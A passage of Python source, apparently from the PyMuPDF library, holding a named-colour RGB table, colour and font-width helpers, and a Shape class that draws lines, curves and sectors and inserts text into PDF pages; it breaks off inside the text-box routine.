("LIGHTCYAN", 224, 255, 255), ("LIGHTCYAN1", 224, 255, 255), ("LIGHTCYAN2", 209, 238, 238), ("LIGHTCYAN3", 180, 205, 205), ("LIGHTCYAN4", 122, 139, 139), ("LIGHTGOLDENROD", 238, 221, 130), ("LIGHTGOLDENROD1", 255, 236, 139), ("LIGHTGOLDENROD2", 238, 220, 130), ("LIGHTGOLDENROD3", 205, 190, 112), ("LIGHTGOLDENROD4", 139, 129, 76), ("LIGHTGOLDENRODYELLOW", 250, 250, 210), ("LIGHTGREEN", 144, 238, 144), ("LIGHTGRAY", 211, 211, 211), ("LIGHTPINK", 255, 182, 193), ("LIGHTPINK1", 255, 174, 185), ("LIGHTPINK2", 238, 162, 173), ("LIGHTPINK3", 205, 140, 149), ("LIGHTPINK4", 139, 95, 101), ("LIGHTSALMON", 255, 160, 122), ("LIGHTSALMON1", 255, 160, 122), ("LIGHTSALMON2", 238, 149, 114), ("LIGHTSALMON3", 205, 129, 98), ("LIGHTSALMON4", 139, 87, 66), ("LIGHTSEAGREEN", 32, 178, 170), ("LIGHTSKYBLUE", 135, 206, 250), ("LIGHTSKYBLUE1", 176, 226, 255), ("LIGHTSKYBLUE2", 164, 211, 238), ("LIGHTSKYBLUE3", 141, 182, 205), ("LIGHTSKYBLUE4", 96, 123, 139), ("LIGHTSLATEBLUE", 132, 112, 255), ("LIGHTSLATEGRAY", 119, 136, 153), ("LIGHTSTEELBLUE", 176, 196, 222), ("LIGHTSTEELBLUE1", 202, 225, 255), ("LIGHTSTEELBLUE2", 188, 210, 238), ("LIGHTSTEELBLUE3", 162, 181, 205), ("LIGHTSTEELBLUE4", 110, 123, 139), ("LIGHTYELLOW", 255, 255, 224), ("LIGHTYELLOW1", 255, 255, 224), ("LIGHTYELLOW2", 238, 238, 209), ("LIGHTYELLOW3", 205, 205, 180), ("LIGHTYELLOW4", 139, 139, 122), ("LIMEGREEN", 50, 205, 50), ("LINEN", 250, 240, 230), ("MAGENTA", 255, 0, 255), ("MAGENTA1", 255, 0, 255), ("MAGENTA2", 238, 0, 238), ("MAGENTA3", 205, 0, 205), ("MAGENTA4", 139, 0, 139), ("MAROON", 176, 48, 96), ("MAROON1", 255, 52, 179), ("MAROON2", 238, 48, 167), ("MAROON3", 205, 41, 144), ("MAROON4", 139, 28, 98), ("MEDIUMAQUAMARINE", 102, 205, 170), ("MEDIUMBLUE", 0, 0, 205), ("MEDIUMORCHID", 186, 85, 211), ("MEDIUMORCHID1", 224, 102, 255), ("MEDIUMORCHID2", 209, 95, 238), ("MEDIUMORCHID3", 180, 82, 205), ("MEDIUMORCHID4", 122, 55, 139), ("MEDIUMPURPLE", 147, 112, 219), ("MEDIUMPURPLE1", 171, 130, 255), ("MEDIUMPURPLE2", 159, 121, 238), ("MEDIUMPURPLE3", 137, 104, 205), ("MEDIUMPURPLE4", 93, 71, 139), ("MEDIUMSEAGREEN", 60, 179, 113), ("MEDIUMSLATEBLUE", 123, 104, 238), ("MEDIUMSPRINGGREEN", 0, 250, 154), ("MEDIUMTURQUOISE", 72, 209, 204), ("MEDIUMVIOLETRED", 199, 21, 133), ("MIDNIGHTBLUE", 25, 25, 112), ("MINTCREAM", 245, 255, 250), ("MISTYROSE", 255, 228, 225), ("MISTYROSE1", 255, 228, 225), ("MISTYROSE2", 238, 213, 210), ("MISTYROSE3", 205, 183, 181), ("MISTYROSE4", 139, 125, 123), ("MOCCASIN", 255, 228, 181), ("MUPDFBLUE", 37, 114, 172), ("NAVAJOWHITE", 255, 222, 173), ("NAVAJOWHITE1", 255, 222, 173), ("NAVAJOWHITE2", 238, 207, 161), ("NAVAJOWHITE3", 205, 179, 139), ("NAVAJOWHITE4", 139, 121, 94), ("NAVY", 0, 0, 128), ("NAVYBLUE", 0, 0, 128), ("OLDLACE", 253, 245, 230), ("OLIVEDRAB", 107, 142, 35), ("OLIVEDRAB1", 192, 255, 62), ("OLIVEDRAB2", 179, 238, 58), ("OLIVEDRAB3", 154, 205, 50), ("OLIVEDRAB4", 105, 139, 34), ("ORANGE", 255, 165, 0), ("ORANGE1", 255, 165, 0), ("ORANGE2", 238, 154, 0), ("ORANGE3", 205, 133, 0), ("ORANGE4", 139, 90, 0), ("ORANGERED", 255, 69, 0), ("ORANGERED1", 255, 69, 0), ("ORANGERED2", 238, 64, 0), ("ORANGERED3", 205, 55, 0), ("ORANGERED4", 139, 37, 0), ("ORCHID", 218, 112, 214), ("ORCHID1", 255, 131, 250), ("ORCHID2", 238, 122, 233), ("ORCHID3", 205, 105, 201), ("ORCHID4", 139, 71, 137), ("PALEGOLDENROD", 238, 232, 170), ("PALEGREEN", 152, 251, 152), ("PALEGREEN1", 154, 255, 154), ("PALEGREEN2", 144, 238, 144), ("PALEGREEN3", 124, 205, 124), ("PALEGREEN4", 84, 139, 84), ("PALETURQUOISE", 175, 238, 238), ("PALETURQUOISE1", 187, 255, 255), ("PALETURQUOISE2", 174, 238, 238), ("PALETURQUOISE3", 150, 205, 205), ("PALETURQUOISE4", 102, 139, 139), ("PALEVIOLETRED", 219, 112, 147), ("PALEVIOLETRED1", 255, 130, 171), ("PALEVIOLETRED2", 238, 121, 159), ("PALEVIOLETRED3", 205, 104, 137), ("PALEVIOLETRED4", 139, 71, 93), ("PAPAYAWHIP", 255, 239, 213), ("PEACHPUFF", 255, 218, 185), ("PEACHPUFF1", 255, 218, 185), ("PEACHPUFF2", 238, 203, 173), ("PEACHPUFF3", 205, 175, 149), ("PEACHPUFF4", 139, 119, 101), ("PERU", 205, 133, 63), ("PINK", 255, 192, 203), ("PINK1", 255, 181, 197), ("PINK2", 238, 169, 184), ("PINK3", 205, 145, 158), ("PINK4", 139, 99, 108), ("PLUM", 221, 160, 221), ("PLUM1", 255, 187, 255), ("PLUM2", 238, 174, 238), ("PLUM3", 205, 150, 205), ("PLUM4", 139, 102, 139), ("POWDERBLUE", 176, 224, 230), ("PURPLE", 160, 32, 240), ("PURPLE1", 155, 48, 255), ("PURPLE2", 145, 44, 238), ("PURPLE3", 125, 38, 205), ("PURPLE4", 85, 26, 139), ("PY_COLOR", 240, 255, 210), ("RED", 255, 0, 0), ("RED1", 255, 0, 0), ("RED2", 238, 0, 0), ("RED3", 205, 0, 0), ("RED4", 139, 0, 0), ("ROSYBROWN", 188, 143, 143), ("ROSYBROWN1", 255, 193, 193), ("ROSYBROWN2", 238, 180, 180), ("ROSYBROWN3", 205, 155, 155), ("ROSYBROWN4", 139, 105, 105), ("ROYALBLUE", 65, 105, 225), ("ROYALBLUE1", 72, 118, 255), ("ROYALBLUE2", 67, 110, 238), ("ROYALBLUE3", 58, 95, 205), ("ROYALBLUE4", 39, 64, 139), ("SADDLEBROWN", 139, 69, 19), ("SALMON", 250, 128, 114), ("SALMON1", 255, 140, 105), ("SALMON2", 238, 130, 98), ("SALMON3", 205, 112, 84), ("SALMON4", 139, 76, 57), ("SANDYBROWN", 244, 164, 96), ("SEAGREEN", 46, 139, 87), ("SEAGREEN1", 84, 255, 159), ("SEAGREEN2", 78, 238, 148), ("SEAGREEN3", 67, 205, 128), ("SEAGREEN4", 46, 139, 87), ("SEASHELL", 255, 245, 238), ("SEASHELL1", 255, 245, 238), ("SEASHELL2", 238, 229, 222), ("SEASHELL3", 205, 197, 191), ("SEASHELL4", 139, 134, 130), ("SIENNA", 160, 82, 45), ("SIENNA1", 255, 130, 71), ("SIENNA2", 238, 121, 66), ("SIENNA3", 205, 104, 57), ("SIENNA4", 139, 71, 38), ("SKYBLUE", 135, 206, 235), ("SKYBLUE1", 135, 206, 255), ("SKYBLUE2", 126, 192, 238), ("SKYBLUE3", 108, 166, 205), ("SKYBLUE4", 74, 112, 139), ("SLATEBLUE", 106, 90, 205), ("SLATEBLUE1", 131, 111, 255), ("SLATEBLUE2", 122, 103, 238), ("SLATEBLUE3", 105, 89, 205), ("SLATEBLUE4", 71, 60, 139), ("SLATEGRAY", 112, 128, 144), ("SNOW", 255, 250, 250), ("SNOW1", 255, 250, 250), ("SNOW2", 238, 233, 233), ("SNOW3", 205, 201, 201), ("SNOW4", 139, 137, 137), ("SPRINGGREEN", 0, 255, 127), ("SPRINGGREEN1", 0, 255, 127), ("SPRINGGREEN2", 0, 238, 118), ("SPRINGGREEN3", 0, 205, 102), ("SPRINGGREEN4", 0, 139, 69), ("STEELBLUE", 70, 130, 180), ("STEELBLUE1", 99, 184, 255), ("STEELBLUE2", 92, 172, 238), ("STEELBLUE3", 79, 148, 205), ("STEELBLUE4", 54, 100, 139), ("TAN", 210, 180, 140), ("TAN1", 255, 165, 79), ("TAN2", 238, 154, 73), ("TAN3", 205, 133, 63), ("TAN4", 139, 90, 43), ("THISTLE", 216, 191, 216), ("THISTLE1", 255, 225, 255), ("THISTLE2", 238, 210, 238), ("THISTLE3", 205, 181, 205), ("THISTLE4", 139, 123, 139), ("TOMATO", 255, 99, 71), ("TOMATO1", 255, 99, 71), ("TOMATO2", 238, 92, 66), ("TOMATO3", 205, 79, 57), ("TOMATO4", 139, 54, 38), ("TURQUOISE", 64, 224, 208), ("TURQUOISE1", 0, 245, 255), ("TURQUOISE2", 0, 229, 238), ("TURQUOISE3", 0, 197, 205), ("TURQUOISE4", 0, 134, 139), ("VIOLET", 238, 130, 238), ("VIOLETRED", 208, 32, 144), ("VIOLETRED1", 255, 62, 150), ("VIOLETRED2", 238, 58, 140), ("VIOLETRED3", 205, 50, 120), ("VIOLETRED4", 139, 34, 82), ("WHEAT", 245, 222, 179), ("WHEAT1", 255, 231, 186), ("WHEAT2", 238, 216, 174), ("WHEAT3", 205, 186, 150), ("WHEAT4", 139, 126, 102), ("WHITE", 255, 255, 255), ("WHITESMOKE", 245, 245, 245), ("YELLOW", 255, 255, 0), ("YELLOW1", 255, 255, 0), ("YELLOW2", 238, 238, 0), ("YELLOW3", 205, 205, 0), ("YELLOW4", 139, 139, 0), ("YELLOWGREEN", 154, 205, 50), ] def getColor(name): """Retrieve RGB color in PDF format by name. Returns: a triple of floats in range 0 to 1. In case of name-not-found, "white" is returned. """ try: c = getColorInfoList()[getColorList().index(name.upper())] return (c[1] / 255., c[2] / 255., c[3] / 255.) except: return (1, 1, 1) def getColorHSV(name): """Retrieve the hue, saturation, value triple of a color name. Returns: a triple (degree, percent, percent). If not found (-1, -1, -1) is returned. """ try: x = getColorInfoList()[getColorList().index(name.upper())] except: return (-1, -1, -1) r = x[1] / 255. g = x[2] / 255. b = x[3] / 255. cmax = max(r, g, b) V = round(cmax * 100, 1) cmin = min(r, g, b) delta = cmax - cmin if delta == 0: hue = 0 elif cmax == r: hue = 60. * (((g - b)/delta) % 6) elif cmax == g: hue = 60. * (((b - r)/delta) + 2) else: hue = 60. * (((r - g)/delta) + 4) H = int(round(hue)) if cmax == 0: sat = 0 else: sat = delta / cmax S = int(round(sat * 100)) return (H, S, V) def getCharWidths(doc, xref, limit = 256, idx = 0): """Get list of glyph information of a font. Notes: Must be provided by its XREF number. If we already dealt with the font, it will be recorded in doc.FontInfos. Otherwise we insert an entry there. Finally we return the glyphs for the font. This is a list of (glyph, width) where glyph is an integer controlling the char appearance, and width is a float controlling the char's spacing: width * fontsize is the actual space. For 'simple' fonts, glyph == ord(char) will usually be true. Exceptions are 'Symbol' and 'ZapfDingbats'. We are providing data for these directly here. """ fontinfo = CheckFontInfo(doc, xref) if fontinfo is None: # not recorded yet: create it name, ext, stype, _ = doc.extractFont(xref, info_only = True) fontdict = {"name": name, "type": stype, "ext": ext} if ext == "": raise ValueError("xref is not a font") # check for 'simple' fonts if stype in ("Type1", "MMType1", "TrueType"): simple = True else: simple = False # check for CJK fonts if name in ("Fangti", "Ming"): ordering = 0 elif name in ("Heiti", "Song"): ordering = 1 elif name in ("Gothic", "Mincho"): ordering = 2 elif name in ("Dotum", "Batang"): ordering = 3 else: ordering = -1 fontdict["simple"] = simple if name == "ZapfDingbats": glyphs = zapf_glyphs elif name == "Symbol": glyphs = symbol_glyphs else: glyphs = None fontdict["glyphs"] = glyphs fontdict["ordering"] = ordering fontinfo = [xref, fontdict] doc.FontInfos.append(fontinfo) else: fontdict = fontinfo[1] glyphs = fontdict["glyphs"] simple = fontdict["simple"] ordering = fontdict["ordering"] if glyphs is None: oldlimit = 0 else: oldlimit = len(glyphs) mylimit = max(256, limit) if mylimit <= oldlimit: return glyphs if ordering < 0: # not a CJK font glyphs = doc._getCharWidths(xref, fontdict["name"], fontdict["ext"], fontdict["ordering"], mylimit, idx) else: # CJK fonts use char codes and width = 1 glyphs = None fontdict["glyphs"] = glyphs fontinfo[1] = fontdict UpdateFontInfo(doc, fontinfo) return glyphs class Shape(object): """Create a new shape. """ @staticmethod def horizontal_angle(C, P): """Return the angle to the horizontal for the connection from C to P. This uses the arcus sine function and resolves its inherent ambiguity by looking up in which quadrant vector S = P - C is located. """ S = Point(P - C).unit # unit vector 'C' -> 'P' alfa = math.asin(abs(S.y)) # absolute angle from horizontal if S.x < 0: # make arcsin result unique if S.y <= 0: # bottom-left alfa = -(math.pi - alfa) else: # top-left alfa = math.pi - alfa else: if S.y >= 0: # top-right pass else: # bottom-right alfa = - alfa return alfa def __init__(self, page): CheckParent(page) self.page = page self.doc = page.parent if not self.doc.isPDF: raise ValueError("not a PDF") self.height = page.MediaBoxSize.y self.width = page.MediaBoxSize.x self.x = page.CropBoxPosition.x self.y = page.CropBoxPosition.y self.pctm = page._getTransformation() # page transf. matrix self.ipctm = ~self.pctm # inverted transf. matrix self.draw_cont = "" self.text_cont = "" self.totalcont = "" self.lastPoint = None self.rect = None def updateRect(self, x): if self.rect is None: if len(x) == 2: self.rect = Rect(x, x) else: self.rect = Rect(x) else: if len(x) == 2: x = Point(x) self.rect.x0 = min(self.rect.x0, x.x) self.rect.y0 = min(self.rect.y0, x.y) self.rect.x1 = max(self.rect.x1, x.x) self.rect.y1 = max(self.rect.y1, x.y) else: x = Rect(x) self.rect.x0 = min(self.rect.x0, x.x0) self.rect.y0 = min(self.rect.y0, x.y0) self.rect.x1 = max(self.rect.x1, x.x1) self.rect.y1 = max(self.rect.y1, x.y1) def drawLine(self, p1, p2): """Draw a line between two points. """ p1 = Point(p1) p2 = Point(p2) if not (self.lastPoint == p1): self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm) self.lastPoint = p1 self.updateRect(p1) self.draw_cont += "%g %g l\n" % JM_TUPLE(p2 * self.ipctm) self.updateRect(p2) self.lastPoint = p2 return self.lastPoint def drawPolyline(self, points): """Draw several connected line segments. """ for i, p in enumerate(points): if i == 0: if not (self.lastPoint == Point(p)): self.draw_cont += "%g %g m\n" % JM_TUPLE(Point(p) * self.ipctm) self.lastPoint = Point(p) else: self.draw_cont += "%g %g l\n" % JM_TUPLE(Point(p) * self.ipctm) self.updateRect(p) self.lastPoint = Point(points[-1]) return self.lastPoint def drawBezier(self, p1, p2, p3, p4): """Draw a standard cubic Bezier curve. """ p1 = Point(p1) p2 = Point(p2) p3 = Point(p3) p4 = Point(p4) if not (self.lastPoint == p1): self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm) self.draw_cont += "%g %g %g %g %g %g c\n" % JM_TUPLE(list(p2 * self.ipctm) + \ list(p3 * self.ipctm) + \ list(p4 * self.ipctm)) self.updateRect(p1) self.updateRect(p2) self.updateRect(p3) self.updateRect(p4) self.lastPoint = p4 return self.lastPoint def drawOval(self, tetra): """Draw an ellipse inside a tetrapod. """ if len(tetra) != 4: raise ValueError("invalid arg length") if hasattr(tetra[0], "__float__"): q = Rect(tetra).quad else: q = Quad(tetra) mt = q.ul + (q.ur - q.ul) * 0.5 mr = q.ur + (q.lr - q.ur) * 0.5 mb = q.ll + (q.lr - q.ll) * 0.5 ml = q.ul + (q.ll - q.ul) * 0.5 if not (self.lastPoint == ml): self.draw_cont += "%g %g m\n" % JM_TUPLE(ml * self.ipctm) self.lastPoint = ml self.drawCurve(ml, q.ll, mb) self.drawCurve(mb, q.lr, mr) self.drawCurve(mr, q.ur, mt) self.drawCurve(mt, q.ul, ml) self.updateRect(q.rect) self.lastPoint = ml return self.lastPoint def drawCircle(self, center, radius): """Draw a circle given its center and radius. """ if not radius > EPSILON: raise ValueError("radius must be postive") center = Point(center) p1 = center - (radius, 0) return self.drawSector(center, p1, 360, fullSector=False) def drawCurve(self, p1, p2, p3): """Draw a curve between points using one control point. """ kappa = 0.55228474983 p1 = Point(p1) p2 = Point(p2) p3 = Point(p3) k1 = p1 + (p2 - p1) * kappa k2 = p3 + (p2 - p3) * kappa return self.drawBezier(p1, k1, k2, p3) def drawSector(self, center, point, beta, fullSector=True): """Draw a circle sector. """ center = Point(center) point = Point(point) l3 = "%g %g m\n" l4 = "%g %g %g %g %g %g c\n" l5 = "%g %g l\n" betar = math.radians(-beta) w360 = math.radians(math.copysign(360, betar)) * (-1) w90 = math.radians(math.copysign(90, betar)) w45 = w90 / 2 while abs(betar) > 2 * math.pi: betar += w360 # bring angle below 360 degrees if not (self.lastPoint == point): self.draw_cont += l3 % JM_TUPLE(point * self.ipctm) self.lastPoint = point Q = Point(0, 0) # just make sure it exists C = center P = point S = P - C # vector 'center' -> 'point' rad = abs(S) # circle radius if not rad > EPSILON: raise ValueError("radius must be positive") alfa = self.horizontal_angle(center, point) while abs(betar) > abs(w90): # draw 90 degree arcs q1 = C.x + math.cos(alfa + w90) * rad q2 = C.y + math.sin(alfa + w90) * rad Q = Point(q1, q2) # the arc's end point r1 = C.x + math.cos(alfa + w45) * rad / math.cos(w45) r2 = C.y + math.sin(alfa + w45) * rad / math.cos(w45) R = Point(r1, r2) # crossing point of tangents kappah = (1 - math.cos(w45)) * 4 / 3 / abs(R - Q) kappa = kappah * abs(P - Q) cp1 = P + (R - P) * kappa # control point 1 cp2 = Q + (R - Q) * kappa # control point 2 self.draw_cont += l4 % JM_TUPLE(list(cp1 * self.ipctm) + \ list(cp2 * self.ipctm) + \ list(Q * self.ipctm)) betar -= w90 # reduce parm angle by 90 deg alfa += w90 # advance start angle by 90 deg P = Q # advance to arc end point # draw (remaining) arc if abs(betar) > 1e-3: # significant degrees left? beta2 = betar / 2 q1 = C.x + math.cos(alfa + betar) * rad q2 = C.y + math.sin(alfa + betar) * rad Q = Point(q1, q2) # the arc's end point r1 = C.x + math.cos(alfa + beta2) * rad / math.cos(beta2) r2 = C.y + math.sin(alfa + beta2) * rad / math.cos(beta2) R = Point(r1, r2) # crossing point of tangents # kappa height is 4/3 of segment height kappah = (1 - math.cos(beta2)) * 4 / 3 / abs(R - Q) # kappa height kappa = kappah * abs(P - Q) / (1 - math.cos(betar)) cp1 = P + (R - P) * kappa # control point 1 cp2 = Q + (R - Q) * kappa # control point 2 self.draw_cont += l4 % JM_TUPLE(list(cp1 * self.ipctm) + \ list(cp2 * self.ipctm) + \ list(Q * self.ipctm)) if fullSector: self.draw_cont += l3 % JM_TUPLE(point * self.ipctm) self.draw_cont += l5 % JM_TUPLE(center * self.ipctm) self.draw_cont += l5 % JM_TUPLE(Q * self.ipctm) self.lastPoint = Q return self.lastPoint def drawRect(self, rect): """Draw a rectangle. """ r = Rect(rect) self.draw_cont += "%g %g %g %g re\n" % JM_TUPLE(list(r.bl * self.ipctm) + \ [r.width, r.height]) self.updateRect(r) self.lastPoint = r.tl return self.lastPoint def drawQuad(self, quad): """Draw a Quad. """ q = Quad(quad) return self.drawPolyline([q.ul, q.ll, q.lr, q.ur, q.ul]) def drawZigzag(self, p1, p2, breadth = 2): """Draw a zig-zagged line from p1 to p2. """ p1 = Point(p1) p2 = Point(p2) S = p2 - p1 # vector start - end rad = abs(S) # distance of points cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases if cnt < 4: raise ValueError("points too close") mb = rad / cnt # revised breadth matrix = TOOLS._hor_matrix(p1, p2) # normalize line to x-axis i_mat = ~matrix # get original position points = [] # stores edges for i in range (1, cnt): if i % 4 == 1: # point "above" connection p = Point(i, -1) * mb elif i % 4 == 3: # point "below" connection p = Point(i, 1) * mb else: # ignore others continue points.append(p * i_mat) self.drawPolyline([p1] + points + [p2]) # add start and end points return p2 def drawSquiggle(self, p1, p2, breadth = 2): """Draw a squiggly line from p1 to p2. """ p1 = Point(p1) p2 = Point(p2) S = p2 - p1 # vector start - end rad = abs(S) # distance of points cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases if cnt < 4: raise ValueError("points too close") mb = rad / cnt # revised breadth matrix = TOOLS._hor_matrix(p1, p2) # normalize line to x-axis i_mat = ~matrix # get original position k = 2.4142135623765633 # y of drawCurve helper point points = [] # stores edges for i in range (1, cnt): if i % 4 == 1: # point "above" connection p = Point(i, -k) * mb elif i % 4 == 3: # point "below" connection p = Point(i, k) * mb else: # else on connection line p = Point(i, 0) * mb points.append(p * i_mat) points = [p1] + points + [p2] cnt = len(points) i = 0 while i + 2 < cnt: self.drawCurve(points[i], points[i+1], points[i+2]) i += 2 return p2 #============================================================================== # Shape.insertText #============================================================================== def insertText(self, point, buffer, fontsize=11, fontname="helv", fontfile=None, set_simple=0, encoding=0, color=None, fill=None, render_mode=0, border_width=1, rotate=0, morph=None): # ensure 'text' is a list of strings, worth dealing with if not bool(buffer): return 0 if type(buffer) not in (list, tuple): text = buffer.splitlines() else: text = buffer if not len(text) > 0: return 0 point = Point(point) try: maxcode = max([ord(c) for c in " ".join(text)]) except: return 0 # ensure valid 'fontname' fname = fontname if fname.startswith("/"): fname = fname[1:] xref = self.page.insertFont(fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple, ) fontinfo = CheckFontInfo(self.doc, xref) fontdict = fontinfo[1] ordering = fontdict["ordering"] simple = fontdict["simple"] bfname = fontdict["name"] if maxcode > 255: glyphs = self.doc.getCharWidths(xref, maxcode + 1) else: glyphs = fontdict["glyphs"] tab = [] for t in text: if simple and bfname not in ("Symbol", "ZapfDingbats"): g = None else: g = glyphs tab.append(getTJstr(t, g, simple, ordering)) text = tab color_str = ColorCode(color, "c") fill_str = ColorCode(fill, "f") if fill is None and render_mode == 0: # ensure fill color when 0 Tr fill = color fill_str = ColorCode(color, "f") morphing = CheckMorph(morph) rot = rotate if rot % 90 != 0: raise ValueError("rotate not multiple of 90") while rot < 0: rot += 360 rot = rot % 360 # text rotate = 0, 90, 270, 180 templ1 = "\nq BT\n%s1 0 0 1 %g %g Tm /%s %g Tf " templ2 = "TJ\n0 -%g TD\n" cmp90 = "0 1 -1 0 0 0 cm\n" # rotates 90 deg counter-clockwise cmm90 = "0 -1 1 0 0 0 cm\n" # rotates 90 deg clockwise cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg. height = self.height width = self.width lheight = fontsize * 1.2 # line height # setting up for standard rotation directions # case rotate = 0 if morphing: m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) else: cm = "" top = height - point.y - self.y # start of 1st char left = point.x + self.x # start of 1. char space = top # space available headroom = point.y + self.y # distance to page border if rot == 90: left = height - point.y - self.y top = -point.x - self.x cm += cmp90 space = width - abs(top) headroom = point.x + self.x elif rot == 270: left = -height + point.y + self.y top = point.x + self.x cm += cmm90 space = abs(top) headroom = width - point.x - self.x elif rot == 180: left = -point.x - self.x top = -height + point.y + self.y cm += cm180 space = abs(point.y + self.y) headroom = height - point.y - self.y if headroom < fontsize: # at least 1 full line space required! raise ValueError("text starts outside page") nres = templ1 % (cm, left, top, fname, fontsize) if render_mode > 0: nres += "%i Tr " % render_mode if border_width != 1: nres += "%g w " % border_width if color is not None: nres += color_str if fill is not None: nres += fill_str # ========================================================================= # start text insertion # ========================================================================= nres += text[0] nlines = 1 # set output line counter nres += templ2 % lheight # line 1 for i in range(1, len(text)): if space < lheight: break # no space left on page if i > 1: nres += "\nT* " nres += text[i] + templ2[:2] space -= lheight nlines += 1 nres += " ET Q\n" # ========================================================================= # end of text insertion # ========================================================================= # update the /Contents object self.text_cont += nres return nlines #============================================================================== # Shape.insertTextbox #============================================================================== def insertTextbox(self, rect, buffer, fontname="helv", fontfile=None, fontsize=11, set_simple=0, encoding=0, color=None, fill=None, expandtabs=1, border_width=1, align=0, render_mode=0, rotate=0, morph=None): """ Insert text into a given rectangle. Args: rect -- the textbox to fill buffer -- text to be inserted fontname -- a Base-14 font, font name or '/name' fontfile -- name of a font file fontsize -- font size color -- RGB stroke color triple fill -- RGB fill color triple render_mode -- text rendering control border_width -- thickness of glyph borders expandtabs -- handles tabulators with string function align -- left, center, right, justified rotate -- 0, 90, 180, or 270 degrees morph -- morph box with a matrix and a pivotal point Returns: unused or deficit rectangle area (float) """ rect = Rect(rect) if rect.isEmpty or rect.isInfinite: raise ValueError("text box must be finite and not empty") color_str = ColorCode(color, "c") fill_str = ColorCode(fill, "f") if fill is None and render_mode == 0: # ensure fill color for 0 Tr fill = color fill_str = ColorCode(color, "f") if rotate % 90 != 0: raise ValueError("rotate must be multiple of 90") rot = rotate while rot < 0: rot += 360 rot = rot % 360 # is buffer worth of dealing with? if not bool(buffer): return rect.height if rot in (0, 180) else rect.width cmp90 = "0 1 -1 0 0 0 cm\n" # rotates counter-clockwise cmm90 = "0 -1 1 0 0 0 cm\n" # rotates clockwise cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg. height = self.height fname = fontname if fname.startswith("/"): fname = fname[1:] xref = self.page.insertFont(fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple, ) fontinfo = CheckFontInfo(self.doc, xref) fontdict = fontinfo[1] ordering = fontdict["ordering"] simple = fontdict["simple"] glyphs = fontdict["glyphs"] bfname = fontdict["name"] # create a list from buffer, split into its lines if type(buffer) in (list, tuple): t0 = "\n".join(buffer) else: t0 = buffer maxcode = max([ord(c) for c in t0]) # replace invalid char codes for simple fonts if simple and maxcode > 255: t0 = "".join([c if ord(c)<256 else "?" for c in t0]) t0 = t0.splitlines() glyphs = self.doc.getCharWidths(xref, maxcode + 1) if simple and bfname not in ("Symbol", "ZapfDingbats"): tj_glyphs = None else: tj_glyphs = glyphs #---------------------------------------------------------------------- # calculate pixel length of a string #---------------------------------------------------------------------- def pixlen(x): """Calculate pixel length of x.""" if ordering < 0: return sum([glyphs[ord(c)][1] for c in x]) * fontsize else: return len(x) * fontsize #---------------------------------------------------------------------- if ordering < 0: blen = glyphs[32][1] * fontsize # pixel size of space character else: blen = fontsize text = "" # output buffer lheight = fontsize * 1.2 # line height if CheckMorph(morph): m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) else: cm = "" #--------------------------------------------------------------------------- # adjust for text orientation / rotation #--------------------------------------------------------------------------- progr = 1 # direction of line progress c_pnt = Point(0, fontsize) # used for line progress if rot == 0: # normal orientation point = rect.tl + c_pnt # line 1 is 'fontsize' below top pos = point.y + self.y # y of first line maxwidth = rect.width # pixels available in one line maxpos = rect.y1 + self.y # lines must not be below this elif rot == 90: # rotate counter clockwise c_pnt = Point(fontsize, 0) # progress in x-direction point = rect.bl + c_pnt # line 1 'fontsize' away from left pos = point.x + self.x # position of first line maxwidth = rect.height # pixels available in one line maxpos = rect.x1 + self.x # lines must not be right of this cm += cmp90 elif rot == 180: # text upside down c_pnt = -Point(0, fontsize) # progress upwards in y direction point = rect.br + c_pnt # line 1 'fontsize' above bottom pos = point.y + self.y # position of first line maxwidth = rect.width # pixels available in one line progr = -1 # subtract lheight for next line maxpos = rect.y0 + self.y # lines must not be above this cm += cm180 else: # rotate clockwise (270 or -90) c_pnt = -Point(fontsize, 0) # progress from right to left point = rect.tr + c_pnt # line 1 'fontsize' left of right pos = point.x + self.x # position of first line maxwidth = rect.height # pixels available in one line progr = -1 # subtract lheight for next line maxpos = rect.x0 + self.x # lines must not left of this cm += cmm90 #======================================================================= # line loop #======================================================================= just_tab = [] # 'justify' indicators per line for i, line in enumerate(t0): line_t = line.expandtabs(expandtabs).split(" ") # split into words lbuff = "" # init line buffer rest = maxwidth # available line pixels #=================================================================== # word loop #=================================================================== for word in line_t: pl_w = pixlen(word) # pixel len of word if rest >= pl_w: # will it fit on the line? lbuff += word + " " # yes, and append word rest -= (pl_w + blen) # update available line space continue # word won't fit - output line (if not empty) if len(lbuff) > 0: lbuff = lbuff.rstrip() + "\n" # line full, append line break text += lbuff # append to total text pos += lheight * progr # increase line position just_tab.append(True) # line is justify candidate lbuff = "" # re-init line buffer rest = maxwidth # re-init avail. space if pl_w <= maxwidth: # word shorter than 1 line? lbuff = word + " " # start the line with it rest = maxwidth - pl_w - blen # update free space continue # long word: split across multiple lines - char by char ... if len(just_tab) > 0: just_tab[-1] = False # reset justify indicator for c in word: if pixlen(lbuff) <= maxwidth - pixlen(c): lbuff += c else: # line full lbuff += "\n" # close line text += lbuff # append to text pos += lheight * progr # increase line position just_tab.append(False) # do not justify line lbuff = c # start new line with this char lbuff += " " # finish long word rest = maxwidth - pixlen(lbuff) # long word stored if lbuff != "": # unprocessed line content? text += lbuff.rstrip() # append to text just_tab.append(False) # do not justify line if i < len(t0) - 1: # not the last line? text += "\n" # insert line break pos += lheight * progr # increase line position more = (pos - maxpos) * progr # difference to rect size limit if more > EPSILON: # landed too much outside rect return (-1) * more # return deficit, don't output more = abs(more) if more < EPSILON: more = 0 # don't bother with epsilons nres = "\nq BT\n" + cm # initialize output buffer templ = "1 0 0 1 %g %g Tm /%s %g Tf " # center, right, justify: output each line with its own specifics spacing = 0 text_t = text.splitlines() # split text in lines again for i, t in enumerate(text_t): pl = maxwidth - pixlen(t) # length of empty line part pnt = point + c_pnt * (i * 1.2) # text start of line if align == 1: # center: right shift by half width if rot in (0, 180): pnt = pnt + 